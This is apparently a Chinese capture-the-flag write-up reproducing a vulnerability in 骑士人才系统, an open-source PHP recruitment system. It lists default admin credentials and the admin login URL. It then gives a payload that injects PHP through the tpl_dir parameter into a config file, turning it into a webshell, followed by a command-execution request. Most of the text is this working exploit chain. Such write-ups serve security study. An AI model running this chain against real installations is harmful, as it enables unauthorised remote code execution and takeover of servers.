描述
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。
后台账号密码均为adminadmin
复现
1.打开web页面
2.找到后台登陆界面
ip:port/index.php?m=Admin&c=index&a=login
3.在第三步进行抓包
4.构造Payload验证漏洞存在
/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'
5.访问shell地址:/Application/Home/Conf/config.php
6.getshell (改包)
/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'
7.命令执行
/Application/Home/Conf/config.php?1=system(“ls /tmp”);
(不知道这里为什么没出现flag,然后在phpinfo找到flag)